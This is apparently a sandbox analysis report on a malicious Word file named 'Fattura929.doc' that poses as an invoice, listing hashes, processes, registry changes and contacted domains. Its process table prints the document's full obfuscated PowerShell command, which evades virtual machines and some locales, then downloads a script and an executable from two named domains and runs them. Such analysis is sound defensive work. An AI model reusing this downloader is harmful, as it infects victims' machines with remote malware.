File name: | Fattura929.doc |
Full analysis: | https://app.any.run/tasks/3fb5801a-305b-48da-a2cb-5e09d7edfa15 |
Verdict: | Malicious activity |
Analysis date: | August 13, 2019, 16:27:00 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 08:00, Create Time/Date: Mon Jul 22 14:22:00 2019, Last Saved Time/Date: Thu Aug 1 16:22:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | B8A8DE55B62B08FD1458538CC00973D8 |
SHA1: | 87AE405DC261095E33500DAE3F62CCB55C659618 |
SHA256: | 489B4899CE610CCA49BDBC20906D1C97F424551F216D85BC310630B03716A692 |
SSDEEP: | 1536:jC3hskRSSuclIyTPHkDD+WZbz+a9LmXBz9f/P5:jIRSSuclIyoDDe19 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:08:01 15:22:00 |
CreateDate: | 2019:07:22 13:22:00 |
TotalEditTime: | 8.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 4 |
LastModifiedBy: | Administrator |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Administrator |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3976 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Fattura929.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4084 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c function a($a){ return [char]$a; };$sjyt='';59,105,102,40,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,34,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,34,41,32,45,111,114,32,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,34,82,79,124,67,78,124,85,65,124,66,89,124,82,85,34,41,41,123,32,101,120,105,116,59,32,125,59,36,102,98,102,103,61,32,74,111,105,110,45,80,97,116,104,32,36,101,110,118,58,116,101,109,112,32,34,87,52,57,57,48,56,48,49,46,106,115,34,59,36,99,104,103,120,61,32,74,111,105,110,45,80,97,116,104,32,36,101,110,118,58,116,101,109,112,32,34,67,114,121,112,115,114,118,46,101,120,101,34,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,34,104,116,116,112,58,47,47,100,114,105,118,101,46,100,101,101,115,99,114,101,97,116,105,111,110,115,116,111,114,101,46,99,111,109,47,63,110,101,101,100,61,106,115,105,38,118,105,100,61,100,51,38,101,118,103,121,116,34,41,124,111,117,116,45,102,105,108,101,32,36,102,98,102,103,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,102,98,102,103,59,125,99,97,116,99,104,123,125,59,116,114,121,123,32,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,34,104,116,116,112,58,47,47,107,111,112,101,46,100,101,101,115,115,111,108,117,116,105,111,110,115,100,101,109,111,46,99,111,109,47,114,101,108,111,97,100,63,115,100,99,119,34,44,36,99,104,103,120,41,59,32,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,99,104,103,120,59,125,99,97,116,99,104,123,125,59,59|%{$zdxyd=a($_);$sjyt+=$zdxyd};iex $sjyt; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3976) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | &6? |
Value: 26363F00880F0000010000000000000000000000 | |||
(PID) Process: | (3976) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3976) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (3976) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1326252062 | |||
(PID) Process: | (3976) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1326252176 | |||
(PID) Process: | (3976) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1326252177 | |||
(PID) Process: | (3976) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 880F0000D8320DF8F351D50100000000 | |||
(PID) Process: | (3976) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | ?7? |
Value: 3F373F00880F000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3976) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | ?7? |
Value: 3F373F00880F000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3976) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9E86.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4084 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3OP5OVKYEXWZUD31JV42.temp | — | |
MD5:— | SHA256:— | |||
4084 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A25A3218432767D044A42DFB20430D13 | SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7 | |||
3976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ttura929.doc | pgc | |
MD5:8E1A7D1CFDB6ADA0B3FBBAE88FA63FAA | SHA256:0CD1024807363C0F749B6149202258B40579B5E81D1A1F30B717012684D2862D | |||
4084 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF37a58b.TMP | binary | |
MD5:A25A3218432767D044A42DFB20430D13 | SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7 | |||
3976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C5B8C883246A2DEBDFC1C1EE8F22BE3F | SHA256:9877F007EF2D6D926C246EF734160E9CA8CA0A7DF467C9A8F22AB6B2027CAADF |
Domain | IP | Reputation |
---|---|---|
drive.deescreationstore.com |
| malicious |
kope.deessolutionsdemo.com |
| unknown |